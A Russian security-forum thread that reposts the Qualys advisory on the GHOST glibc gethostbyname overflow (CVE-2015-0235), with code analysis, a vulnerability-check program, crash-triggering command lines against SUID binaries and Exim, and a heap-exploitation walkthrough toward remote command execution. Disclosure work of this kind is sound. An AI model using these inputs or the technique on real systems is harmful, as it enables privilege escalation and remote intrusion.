Старый 28.01.2015, 10:57   #1
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию CVE-2015-0235 GHOST: glibc gethostbyname buffer overflow

встречайте свежий пиздец с кодовым именем "GHOST", вкратце: удалённое выполнение кода во множестве софта, точто уязвим exim.

http://packetstormsecurity.com/files/130115/Qualys-CVE-2015-0235.txt

Код:
Qualys Security Advisory CVE-2015-0235

GHOST: glibc gethostbyname buffer overflow


--[ Contents ]----------------------------------------------------------------

1 - Summary
2 - Analysis
3 - Mitigating factors
4 - Case studies
5 - Exploitation
6 - Acknowledgments


--[ 1 - Summary ]-------------------------------------------------------------

During a code audit performed internally at Qualys, we discovered a
buffer overflow in the __nss_hostname_digits_dots() function of the GNU
C Library (glibc). This bug is reachable both locally and remotely via
the gethostbyname*() functions, so we decided to analyze it -- and its
impact -- thoroughly, and named this vulnerability "GHOST".

Our main conclusions are:

- Via gethostbyname() or gethostbyname2(), the overflowed buffer is
  located in the heap. Via gethostbyname_r() or gethostbyname2_r(), the
  overflowed buffer is caller-supplied (and may therefore be located in
  the heap, stack, .data, .bss, etc; however, we have seen no such call
  in practice).

- At most sizeof(char *) bytes can be overwritten (ie, 4 bytes on 32-bit
  machines, and 8 bytes on 64-bit machines). Bytes can be overwritten
  only with digits ('0'...'9'), dots ('.'), and a terminating null
  character ('\0').

- Despite these limitations, arbitrary code execution can be achieved.
  As a proof of concept, we developed a full-fledged remote exploit
  against the Exim mail server, bypassing all existing protections
  (ASLR, PIE, and NX) on both 32-bit and 64-bit machines. We will
  publish our exploit as a Metasploit module in the near future.

- The first vulnerable version of the GNU C Library is glibc-2.2,
  released on November 10, 2000.

- We identified a number of factors that mitigate the impact of this
  bug. In particular, we discovered that it was fixed on May 21, 2013
  (between the releases of glibc-2.17 and glibc-2.18). Unfortunately, it
  was not recognized as a security threat; as a result, most stable and
  long-term-support distributions were left exposed (and still are):
  Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7,
  Ubuntu 12.04, for example.


--[ 2 - Analysis ]------------------------------------------------------------

The vulnerable function, __nss_hostname_digits_dots(), is called
internally by the glibc in nss/getXXbyYY.c (the non-reentrant version)
and nss/getXXbyYY_r.c (the reentrant version). However, the calls are
surrounded by #ifdef HANDLE_DIGITS_DOTS, a macro defined only in:

- inet/gethstbynm.c
- inet/gethstbynm2.c
- inet/gethstbynm_r.c
- inet/gethstbynm2_r.c
- nscd/gethstbynm3_r.c

These files implement the gethostbyname*() family, and hence the only
way to reach __nss_hostname_digits_dots() and its buffer overflow. The
purpose of this function is to avoid expensive DNS lookups if the
hostname argument is already an IPv4 or IPv6 address.

The code below comes from glibc-2.17:

 35 int
 36 __nss_hostname_digits_dots (const char *name, struct hostent *resbuf,
 37                             char **buffer, size_t *buffer_size,
 38                             size_t buflen, struct hostent **result,
 39                             enum nss_status *status, int af, int *h_errnop)
 40 {
 ..
 57   if (isdigit (name[0]) || isxdigit (name[0]) || name[0] == ':')
 58     {
 59       const char *cp;
 60       char *hostname;
 61       typedef unsigned char host_addr_t[16];
 62       host_addr_t *host_addr;
 63       typedef char *host_addr_list_t[2];
 64       host_addr_list_t *h_addr_ptrs;
 65       char **h_alias_ptr;
 66       size_t size_needed;
 ..
 85       size_needed = (sizeof (*host_addr)
 86                      + sizeof (*h_addr_ptrs) + strlen (name) + 1);
 87
 88       if (buffer_size == NULL)
 89         {
 90           if (buflen < size_needed)
 91             {
 ..
 95               goto done;
 96             }
 97         }
 98       else if (buffer_size != NULL && *buffer_size < size_needed)
 99         {
100           char *new_buf;
101           *buffer_size = size_needed;
102           new_buf = (char *) realloc (*buffer, *buffer_size);
103
104           if (new_buf == NULL)
105             {
...
114               goto done;
115             }
116           *buffer = new_buf;
117         }
...
121       host_addr = (host_addr_t *) *buffer;
122       h_addr_ptrs = (host_addr_list_t *)
123         ((char *) host_addr + sizeof (*host_addr));
124       h_alias_ptr = (char **) ((char *) h_addr_ptrs + sizeof (*h_addr_ptrs));
125       hostname = (char *) h_alias_ptr + sizeof (*h_alias_ptr);
126
127       if (isdigit (name[0]))
128         {
129           for (cp = name;; ++cp)
130             {
131               if (*cp == '\0')
132                 {
133                   int ok;
134
135                   if (*--cp == '.')
136                     break;
...
142                   if (af == AF_INET)
143                     ok = __inet_aton (name, (struct in_addr *) host_addr);
144                   else
145                     {
146                       assert (af == AF_INET6);
147                       ok = inet_pton (af, name, host_addr) > 0;
148                     }
149                   if (! ok)
150                     {
...
154                       goto done;
155                     }
156
157                   resbuf->h_name = strcpy (hostname, name);
...
194                   goto done;
195                 }
196
197               if (!isdigit (*cp) && *cp != '.')
198                 break;
199             }
200         }
...

Lines 85-86 compute the size_needed to store three (3) distinct entities
in buffer: host_addr, h_addr_ptrs, and name (the hostname). Lines 88-117
make sure the buffer is large enough: lines 88-97 correspond to the
reentrant case, lines 98-117 to the non-reentrant case.

Lines 121-125 prepare pointers to store four (4) distinct entities in
buffer: host_addr, h_addr_ptrs, h_alias_ptr, and hostname. The sizeof
(*h_alias_ptr) -- the size of a char pointer -- is missing from the
computation of size_needed.

The strcpy() on line 157 should therefore allow us to write past the end
of buffer, at most (depending on strlen(name) and alignment) 4 bytes on
32-bit machines, or 8 bytes on 64-bit machines. There is a similar
strcpy() after line 200, but no buffer overflow:

236           size_needed = (sizeof (*host_addr)
237                          + sizeof (*h_addr_ptrs) + strlen (name) + 1);
...
267           host_addr = (host_addr_t *) *buffer;
268           h_addr_ptrs = (host_addr_list_t *)
269             ((char *) host_addr + sizeof (*host_addr));
270           hostname = (char *) h_addr_ptrs + sizeof (*h_addr_ptrs);
...
289                   resbuf->h_name = strcpy (hostname, name);

In order to reach the overflow at line 157, the hostname argument must
meet the following requirements:

- Its first character must be a digit (line 127).

- Its last character must not be a dot (line 135).

- It must comprise only digits and dots (line 197) (we call this the
  "digits-and-dots" requirement).

- It must be long enough to overflow the buffer. For example, the
  non-reentrant gethostbyname*() functions initially allocate their
  buffer with a call to malloc(1024) (the "1-KB" requirement).

- It must be successfully parsed as an IPv4 address by inet_aton() (line
  143), or as an IPv6 address by inet_pton() (line 147). Upon careful
  analysis of these two functions, we can further refine this
  "inet-aton" requirement:

  . It is impossible to successfully parse a "digits-and-dots" hostname
    as an IPv6 address with inet_pton() (':' is forbidden). Hence it is
    impossible to reach the overflow with calls to gethostbyname2() or
    gethostbyname2_r() if the address family argument is AF_INET6.

  . Conclusion: inet_aton() is the only option, and the hostname must
    have one of the following forms: "a.b.c.d", "a.b.c", "a.b", or "a",
    where a, b, c, d must be unsigned integers, at most 0xfffffffful,
    converted successfully (ie, no integer overflow) by strtoul() in
    decimal or octal (but not hexadecimal, because 'x' and 'X' are
    forbidden).


--[ 3 - Mitigating factors ]--------------------------------------------------

The impact of this bug is reduced significantly by the following
reasons:

- A patch already exists (since May 21, 2013), and has been applied and
  tested since glibc-2.18, released on August 12, 2013:

        [BZ #15014]
        * nss/getXXbyYY_r.c (INTERNAL (REENTRANT_NAME))
        [HANDLE_DIGITS_DOTS]: Set any_service when digits-dots parsing was
        successful.
        * nss/digits_dots.c (__nss_hostname_digits_dots): Remove
        redundant variable declarations and reallocation of buffer when
        parsing as IPv6 address.  Always set NSS status when called from
        reentrant functions.  Use NETDB_INTERNAL instead of TRY_AGAIN when
        buffer too small.  Correct computation of needed size.
        * nss/Makefile (tests): Add test-digits-dots.
        * nss/test-digits-dots.c: New test.

- The gethostbyname*() functions are obsolete; with the advent of IPv6,
  recent applications use getaddrinfo() instead.

- Many programs, especially SUID binaries reachable locally, use
  gethostbyname() if, and only if, a preliminary call to inet_aton()
  fails. However, a subsequent call must also succeed (the "inet-aton"
  requirement) in order to reach the overflow: this is impossible, and
  such programs are therefore safe.

- Most of the other programs, especially servers reachable remotely, use
  gethostbyname() to perform forward-confirmed reverse DNS (FCrDNS, also
  known as full-circle reverse DNS) checks. These programs are generally
  safe, because the hostname passed to gethostbyname() has normally been
  pre-validated by DNS software:

  . "a string of labels each containing up to 63 8-bit octets, separated
    by dots, and with a maximum total of 255 octets." This makes it
    impossible to satisfy the "1-KB" requirement.

  . Actually, glibc's DNS resolver can produce hostnames of up to
    (almost) 1025 characters (in case of bit-string labels, and special
    or non-printable characters). But this introduces backslashes ('\\')
    and makes it impossible to satisfy the "digits-and-dots"
    requirement.


--[ 4 - Case studies ]--------------------------------------------------------

In this section, we will analyze real-world examples of programs that
call the gethostbyname*() functions, but we first introduce a small test
program that checks whether a system is vulnerable or not:

[user@fedora-19 ~]$ cat > GHOST.c << EOF
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CANARY "in_the_coal_mine"

struct {
  char buffer[1024];
  char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

int main(void) {
  struct hostent resbuf;
  struct hostent *result;
  int herrno;
  int retval;

  /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
  size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
  char name[sizeof(temp.buffer)];
  memset(name, '0', len);
  name[len] = '\0';

  retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);

  if (strcmp(temp.canary, CANARY) != 0) {
    puts("vulnerable");
    exit(EXIT_SUCCESS);
  }
  if (retval == ERANGE) {
    puts("not vulnerable");
    exit(EXIT_SUCCESS);
  }
  puts("should not happen");
  exit(EXIT_FAILURE);
}
EOF

[user@fedora-19 ~]$ gcc GHOST.c -o GHOST

On Fedora 19 (glibc-2.17):

[user@fedora-19 ~]$ ./GHOST
vulnerable

On Fedora 20 (glibc-2.18):

[user@fedora-20 ~]$ ./GHOST
not vulnerable

----[ 4.1 - The GNU C Library ]-----------------------------------------------

The glibc itself contains a few calls to gethostbyname*() functions. In
particular, getaddrinfo() calls gethostbyname2_r() if, but only if, a
first call to inet_aton() fails: in accordance with the "inet-aton"
requirement, these internal calls are safe. For example,
eglibc-2.13/sysdeps/posix/getaddrinfo.c:

      at->family = AF_UNSPEC;
      ...
      if (__inet_aton (name, (struct in_addr *) at->addr) != 0)
        {
          if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET)
            at->family = AF_INET;
          else if (req->ai_family == AF_INET6 && (req->ai_flags & AI_V4MAPPED))
            {
              ...
              at->family = AF_INET6;
            }
          else
            return -EAI_ADDRFAMILY;
          ...
        }
      ...
      if (at->family == AF_UNSPEC && (req->ai_flags & AI_NUMERICHOST) == 0)
        {
          ...
              size_t tmpbuflen = 512;
              char *tmpbuf = alloca (tmpbuflen);
              ...
                  rc = __gethostbyname2_r (name, family, &th, tmpbuf,
                                           tmpbuflen, &h, &herrno);
          ...
        }

----[ 4.2 - mount.nfs ]-------------------------------------------------------

Similarly, mount.nfs (a SUID-root binary) is not vulnerable:

        if (inet_aton(hostname, &addr->sin_addr))
                return 0;
        if ((hp = gethostbyname(hostname)) == NULL) {
                nfs_error(_("%s: can't get address for %s\n"),
                                progname, hostname);
                return -1;
        }

----[ 4.3 - mtr ]-------------------------------------------------------------

mtr (another SUID-root binary) is not vulnerable either, because it
calls getaddrinfo() instead of gethostbyname*() functions on any modern
(ie, IPv6-enabled) system:

#ifdef ENABLE_IPV6
  /* gethostbyname2() is deprecated so we'll use getaddrinfo() instead. */
  ...
  error = getaddrinfo( Hostname, NULL, &hints, &res );
  if ( error ) {
    if (error == EAI_SYSTEM)
       perror ("Failed to resolve host");
    else
       fprintf (stderr, "Failed to resolve host: %s\n", gai_strerror(error));
    exit( EXIT_FAILURE );
  }
  ...
#else
    host = gethostbyname(Hostname);
  if (host == NULL) {
    herror("mtr gethostbyname");
    exit(1);
  }
  ...
#endif

----[ 4.4 - iputils ]---------------------------------------------------------

------[ 4.4.1 - clockdiff ]---------------------------------------------------

clockdiff is vulnerable in a straightforward manner:

        hp = gethostbyname(argv[1]);
        if (hp == NULL) {
                fprintf(stderr, "clockdiff: %s: host not found\n", argv[1]);
                exit(1);
        }

[user@fedora-19-32b ~]$ ls -l /usr/sbin/clockdiff
-rwxr-xr-x. 1 root root 15076 Feb  1  2013 /usr/sbin/clockdiff

[user@fedora-19-32b ~]$ getcap /usr/sbin/clockdiff
/usr/sbin/clockdiff = cap_net_raw+ep

[user@fedora-19-32b ~]$ /usr/sbin/clockdiff `python -c "print '0' * $((0x10000-16*1-2*4-1-4))"`
.Segmentation fault

[user@fedora-19-32b ~]$ /usr/sbin/clockdiff `python -c "print '0' * $((0x20000-16*1-2*4-1-4))"`
Segmentation fault

[user@fedora-19-32b ~]$ dmesg
...
[202071.118929] clockdiff[3610]: segfault at b86711f4 ip b75de0c6 sp bfc191f0 error 6 in libc-2.17.so[b7567000+1b8000]
[202086.144336] clockdiff[3618]: segfault at b90d0d24 ip b75bb0c6 sp bf8e9dc0 error 6 in libc-2.17.so[b7544000+1b8000]

------[ 4.4.2 - ping and arping ]---------------------------------------------

ping and arping call gethostbyname() and gethostbyname2(), respectively,
if and only if inet_aton() fails first. This time, however, there is
another function call in between (Fedora, for example, does define
USE_IDN):

--------[ 4.4.2.1 - ping ]----------------------------------------------------

                if (inet_aton(target, &whereto.sin_addr) == 1) {
                        ...
                } else {
                        char *idn;
#ifdef USE_IDN
                        int rc;
                        ...
                        rc = idna_to_ascii_lz(target, &idn, 0);
                        if (rc != IDNA_SUCCESS) {
                                fprintf(stderr, "ping: IDN encoding failed: %s\n", idna_strerror(rc));
                                exit(2);
                        }
#else
                        idn = target;
#endif
                        hp = gethostbyname(idn);

--------[ 4.4.2.2 - arping ]--------------------------------------------------

        if (inet_aton(target, &dst) != 1) {
                struct hostent *hp;
                char *idn = target;
#ifdef USE_IDN
                int rc;

                rc = idna_to_ascii_lz(target, &idn, 0);

                if (rc != IDNA_SUCCESS) {
                        fprintf(stderr, "arping: IDN encoding failed: %s\n", idna_strerror(rc));
                        exit(2);
                }
#endif

                hp = gethostbyname2(idn, AF_INET);

--------[ 4.4.2.3 - Analysis ]------------------------------------------------

If idna_to_ascii_lz() modifies the target hostname, the first call to
inet_aton() could fail and the second call (internal to gethostbyname())
could succeed. For example, idna_to_ascii_lz() transforms any Unicode
dot-like character (0x3002, 0xFF0E, 0xFF61) into an ASCII dot (".").

But it also restricts the length of a domain label to 63 characters:
this makes it impossible to reach 1024 bytes (the "1-KB" requirement)
with only 4 labels and 3 dots (the "inet-aton" requirement).

Unless inet_aton() (actually, strtoul()) can be tricked into accepting
more than 3 dots? Indeed, idna_to_ascii_lz() does not restrict the total
length of a domain name. glibc supports "thousands' grouping characters"
(man 3 printf); for example, sscanf(str, "%'lu", &ul) yields 1000 when
processing any of the following input strings:

- "1,000" in an English locale;
- "1 000" in a French locale; and
- "1.000" in a German or Spanish locale.

strtoul() implements this "number grouping" too, but its use is limited
to internal glibc functions. Conclusion: more than 3 dots is impossible,
and neither ping nor arping is vulnerable.

----[ 4.5 - procmail ]--------------------------------------------------------

procmail (a SUID-root and SGID-mail binary) is vulnerable through its
"comsat/biff" feature:

#define COMSAThost      "localhost"    /* where the biff/comsat daemon lives */
...
#define SERV_ADDRsep    '@'           /* when overriding in COMSAT=serv@addr */

int setcomsat(chp)const char*chp;
{ char*chad; ...
  chad=strchr(chp,SERV_ADDRsep);                             /* @ separator? */
  ...
  if(chad)
     *chad++='\0';                                    /* split the specifier */
  if(!chad||!*chad)                                               /* no host */
#ifndef IP_localhost                          /* Is "localhost" preresolved? */
     chad=COMSAThost;                                   /* nope, use default */
#else /* IP_localhost */
   { ...
   }
  else
#endif /* IP_localhost */
   { ...
     if(!(host=gethostbyname(chad))||!host->h_0addr_list)

user@debian-7-2-32b:~$ ls -l /usr/bin/procmail
-rwsr-sr-x 1 root mail 83912 Jun  6  2012 /usr/bin/procmail

user@debian-7-2-32b:~$ /usr/bin/procmail 'VERBOSE=on' 'COMSAT=@'`python -c "print '0' * $((0x500-16*1-2*4-1-4))"` < /dev/null
...
*** glibc detected *** /usr/bin/procmail: free(): invalid next size (normal): 0x0980de30 ***
======= Backtrace: =========
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x70f01)[0xb76b2f01]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x72768)[0xb76b4768]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(cfree+0x6d)[0xb76b781d]
/usr/bin/procmail[0x80548ec]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0xb7658e46]
/usr/bin/procmail[0x804bb55]
======= Memory map: ========
...
0980a000-0982b000 rw-p 00000000 00:00 0          [heap]
...
Aborted

user@debian-7-2-32b:~$ _COMSAT_='COMSAT=@'`python -c "print '0' * $((0x500-16*1-2*4-1-4))"`

user@debian-7-2-32b:~$ /usr/bin/procmail "$_COMSAT_" "$_COMSAT_"1234 < /dev/null
Segmentation fault

user@debian-7-2-32b:~$ /usr/bin/procmail "$_COMSAT_"12345670 "$_COMSAT_"123456701234 < /dev/null
Segmentation fault

user@debian-7-2-32b:~$ dmesg
...
[211409.564917] procmail[4549]: segfault at c ip b768e5a4 sp bfcb53d8 error 4 in libc-2.13.so[b761c000+15c000]
[211495.820710] procmail[4559]: segfault at b8cb290c ip b763c5a4 sp bf870c98 error 4 in libc-2.13.so[b75ca000+15c000]

----[ 4.6 - pppd ]------------------------------------------------------------

pppd (yet another SUID-root binary) calls gethostbyname() if a
preliminary call to inet_addr() (a simple wrapper around inet_aton())
fails. "The inet_addr() function converts the Internet host address cp
from IPv4 numbers-and-dots notation into binary data in network byte
order. If the input is invalid, INADDR_NONE (usually -1) is returned.
Use of this function is problematic because -1 is a valid address
(255.255.255.255)." A failure for inet_addr(), but a success for
inet_aton(), and consequently a path to the buffer overflow.

user@ubuntu-12-04-32b:~$ ls -l /usr/sbin/pppd
-rwsr-xr-- 1 root dip 273272 Feb  3  2011 /usr/sbin/pppd

user@ubuntu-12-04-32b:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev)

------[ 4.6.1 - ms-dns option ]-----------------------------------------------

static int
setdnsaddr(argv)
    char **argv;
{
    u_int32_t dns;
    struct hostent *hp;

    dns = inet_addr(*argv);
    if (dns == (u_int32_t) -1) {
        if ((hp = gethostbyname(*argv)) == NULL) {
            option_error("invalid address parameter '%s' for ms-dns option",
                         *argv);
            return 0;
        }
        dns = *(u_int32_t *)hp->h_addr;
    }

user@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'dryrun' 'ms-dns' `python -c "print '0' * $((0x1000-16*1-2*4-16-4))"`'377.255.255.255'
*** glibc detected *** /usr/sbin/pppd: free(): invalid next size (normal): 0x09c0f928 ***
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x75ee2)[0xb75e1ee2]
/lib/i386-linux-gnu/libc.so.6(+0x65db5)[0xb75d1db5]
/lib/i386-linux-gnu/libc.so.6(fopen+0x2b)[0xb75d1deb]
/usr/sbin/pppd(options_from_file+0xa8)[0x8064948]
/usr/sbin/pppd(options_for_tty+0xde)[0x8064d7e]
/usr/sbin/pppd(tty_process_extra_options+0xa4)[0x806e1a4]
/usr/sbin/pppd(main+0x1cf)[0x8050b2f]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb75854d3]
======= Memory map: ========
...
09c0c000-09c2d000 rw-p 00000000 00:00 0          [heap]
...
Aborted (core dumped)

------[ 4.6.2 - ms-wins option ]----------------------------------------------

static int
setwinsaddr(argv)
    char **argv;
{
    u_int32_t wins;
    struct hostent *hp;

    wins = inet_addr(*argv);
    if (wins == (u_int32_t) -1) {
        if ((hp = gethostbyname(*argv)) == NULL) {
            option_error("invalid address parameter '%s' for ms-wins option",
                         *argv);
            return 0;
        }
        wins = *(u_int32_t *)hp->h_addr;
    }

user@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'dryrun' 'ms-wins' `python -c "print '0' * $((0x1000-16*1-2*4-16-4))"`'377.255.255.255'
*** glibc detected *** /usr/sbin/pppd: free(): invalid next size (normal): 0x08a64928 ***
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x75ee2)[0xb757aee2]
/lib/i386-linux-gnu/libc.so.6(+0x65db5)[0xb756adb5]
/lib/i386-linux-gnu/libc.so.6(fopen+0x2b)[0xb756adeb]
/usr/sbin/pppd(options_from_file+0xa8)[0x8064948]
/usr/sbin/pppd(options_for_tty+0xde)[0x8064d7e]
/usr/sbin/pppd(tty_process_extra_options+0xa4)[0x806e1a4]
/usr/sbin/pppd(main+0x1cf)[0x8050b2f]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb751e4d3]
======= Memory map: ========
...
08a61000-08a82000 rw-p 00000000 00:00 0          [heap]
...
Aborted (core dumped)

------[ 4.6.3 - socket option ]-----------------------------------------------

static int
open_socket(dest)
    char *dest;
{
    char *sep, *endp = NULL;
    int sock, port = -1;
    u_int32_t host;
    struct hostent *hent;
    ...
    sep = strchr(dest, ':');
    if (sep != NULL)
        port = strtol(sep+1, &endp, 10);
    if (port < 0 || endp == sep+1 || sep == dest) {
        error("Can't parse host:port for socket destination");
        return -1;
    }
    *sep = 0;
    host = inet_addr(dest);
    if (host == (u_int32_t) -1) {
        hent = gethostbyname(dest);
        if (hent == NULL) {
            error("%s: unknown host in socket option", dest);
            *sep = ':';
            return -1;
        }
        host = *(u_int32_t *)(hent->h_addr_list[0]);
    }

user@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'socket' `python -c "print '0' * $((0x1000-16*1-2*4-16-4))"`'377.255.255.255:1'
user@ubuntu-12-04-32b:~$ *** glibc detected *** /usr/sbin/pppd: malloc(): memory corruption: 0x09cce270 ***

----[ 4.7 - Exim ]------------------------------------------------------------

The Exim mail server is exploitable remotely if configured to perform
extra security checks on the HELO and EHLO commands ("helo_verify_hosts"
or "helo_try_verify_hosts" option, or "verify = helo" ACL); we developed
a reliable and fully-functional exploit that bypasses all existing
protections (ASLR, PIE, NX) on 32-bit and 64-bit machines.

user@debian-7-7-64b:~$ grep helo /var/lib/exim4/config.autogenerated | grep verify
helo_verify_hosts = *

user@debian-7-7-64b:~$ python -c "print '0' * $((0x500-16*1-2*8-1-8))"
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

user@debian-7-7-64b:~$ telnet 127.0.0.1 25
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 debian-7-7-64b ESMTP Exim 4.80 ...
HELO 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Connection closed by foreign host.

user@debian-7-7-64b:~$ dmesg
...
[ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in libc-2.13.so[7fabef2a2000+182000]


--[ 5 - Exploitation ]--------------------------------------------------------

----[ 5.1 - Code execution ]--------------------------------------------------

In this section, we describe how we achieve remote code execution
against the Exim SMTP mail server, bypassing the NX (No-eXecute)
protection and glibc's malloc hardening.

First, we overflow gethostbyname's heap-based buffer and partially
overwrite the size field of the next contiguous free chunk of memory
with a slightly larger size (we overwrite only 3 bytes of the size
field; in any case, we cannot overflow more than 4 bytes on 32-bit
machines, or 8 bytes on 64-bit machines):


                            |< malloc_chunk
                            |
-----|----------------------|---+--------------------|-----
 ... | gethostbyname buffer |p|s|f|b|F|B| free chunk | ...
-----|----------------------|---+--------------------|-----
     |                         X|
     |------------------------->|
               overflow

where:

struct malloc_chunk {

  INTERNAL_SIZE_T      prev_size;  /* Size of previous chunk (if free).  */
  INTERNAL_SIZE_T      size;       /* Size in bytes, including overhead. */

  struct malloc_chunk* fd;         /* double links -- used only if free. */
  struct malloc_chunk* bk;

  /* Only used for large blocks: pointer to next larger size.  */
  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
  struct malloc_chunk* bk_nextsize;
};

and: X marks the spot where the crucial memory corruption takes place.


As a result, this artificially-enlarged free chunk, which is managed by
glibc's malloc, overlaps another block of memory, Exim's current_block,
which is managed by Exim's internal memory allocator:


                            |< malloc_chunk          |< storeblock
                            |                        |
-----|----------------------|------------------------|---------------+---|-----
 ... | gethostbyname buffer |p|s|f|b|F|B| free chunk |n|l| current_block | ...
-----|----------------------|------------------------|---------------+---|-----
                            |                                        |
                            |<-------------------------------------->|
                                 artificially enlarged free chunk

where:

typedef struct storeblock {
  struct storeblock *next;
  size_t length;
} storeblock;


Then, we partially allocate the enlarged free chunk and overwrite the
beginning of Exim's current_block of memory (the "storeblock" structure)
with arbitrary data. In particular, we overwrite its "next" field:


                            |< malloc_chunk          |< storeblock
                            |                        |
-----|----------------------|------------------------|--------+----------|-----
 ... | gethostbyname buffer |p|s|f|b|F|B| aaaaaaaaaa |n|l| current_block | ...
-----|----------------------|------------------------|--------+----------|-----
                            |                         X       |
                            |<------------------------------->|
                                      allocated chunk


This effectively turns gethostbyname's buffer overflow into a
write-anything-anywhere primitive, because we control both the pointer
to the next block of memory returned by Exim's allocator (the hijacked
"next" pointer) and the data allocated (a null-terminated string, the
argument of an SMTP command we send to Exim).

Finally, we use this write-anything-anywhere primitive to overwrite
Exim's run-time configuration, which is cached in the heap memory. More
precisely, we overwrite Exim's Access Control Lists (ACLs), and achieve
arbitrary command execution thanks to Exim's "${run{<command> <args>}}"
string expansion mechanism:

                                                     |< storeblock
                                                     |
-----|-------------------------------|---------------|-------------------|-----
 ... | Exim's run-time configuration | ... .. .. ... |n|l| current_block | ...
-----|----x--------------------------|---------------|x------------------|-----
          |                                           |
          '<------------------------------------------'
                      hijacked next pointer


                |< ACLs >|
-----|----+-----+--------+------+----|---------------|-------------------|-----
 ... | Exim's run-time configuration | ... .. .. ... | old current_block | ...
-----|----+-----+--------+------+----|---------------|-------------------|-----
          |      XXXXXXXX       |
          |<------------------->|
             new current_block


----[ 5.2 - Information leak ]------------------------------------------------

The success of this exploit depends on an important piece of
information: the address of Exim's run-time configuration in the heap.
In this section, we describe how we obtain this address, bypassing the
ASLR (Address Space Layout Randomization) and PIE (Position Independent
Executable) protections.

First, we overflow gethostbyname's heap-based buffer and partially
overwrite the size field of the next contiguous free chunk of memory
with a slightly larger size:


                            |< malloc_chunk
                            |
-----|----------------------|---+-------------------------|-----
 ... | gethostbyname buffer |p|s|f|b|F|B| next free chunk | ...
-----|----------------------|---+-------------------------|-----
     |                         X|
     |------------------------->|
               overflow


As a result, this artificially-enlarged free chunk overlaps another
block of memory, where Exim saves the error message "503 sender not yet
given\r\n" for later use:


                            |< malloc_chunk
                            |
-----|----------------------|-----------------------------|----------+----|-----
 ... | gethostbyname buffer |p|s|f|b|F|B| real free chunk | error message | ...
-----|----------------------|-----------------------------|----------+----|-----
                            |                                        |
                            |<-------------------------------------->|
                                 artificially enlarged free chunk


Then, we partially allocate the artificially-enlarged free chunk,
thereby splitting it in two: the newly allocated chunk, and a smaller,
free chunk (the remainder from the split). The malloc_chunk header for
this remaining free chunk overwrites the very beginning of the saved
error message with a pointer to the heap (the fd_nextsize pointer):


                            |< malloc_chunk       |< malloc_chunk
                            |                     |
-----|----------------------|---------------------+-------|----------+----|-----
 ... | gethostbyname buffer |p|s|f|b|F|B| aaaaaaa |p|s|f|b|F|B| r message | ...
-----|----------------------|---------------------+-------|----------+----|-----
                            |                     |        X         |
                            |<------------------->|<---------------->|
                                allocated chunk        free chunk


Finally, we send an invalid SMTP command to Exim, and retrieve the
fd_nextsize heap pointer from Exim's SMTP response, which includes the
corrupted error message. This effectively turns gethostbyname's buffer
overflow into an information leak; moreover, it allows us to distinguish
between 32-bit and 64-bit machines.


--[ 6 - Acknowledgments ]-----------------------------------------------------

We would like to thank Alexander Peslyak of the Openwall Project for his
help with the disclosure process of this vulnerability.
12309 вне форума   Ответить с цитированием
Старый 28.01.2015, 14:27   #2
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

может быть не так опасно, как кажется на первый взгляд, но в любом случае лучше обновиться.

Цитата:
Here is a list of potential targets that we investigated (they all call
gethostbyname, one way or another), but to the best of our knowledge,
the buffer overflow cannot be triggered in any of them:

apache, cups, dovecot, gnupg, isc-dhcp, lighttpd, mariadb/mysql,
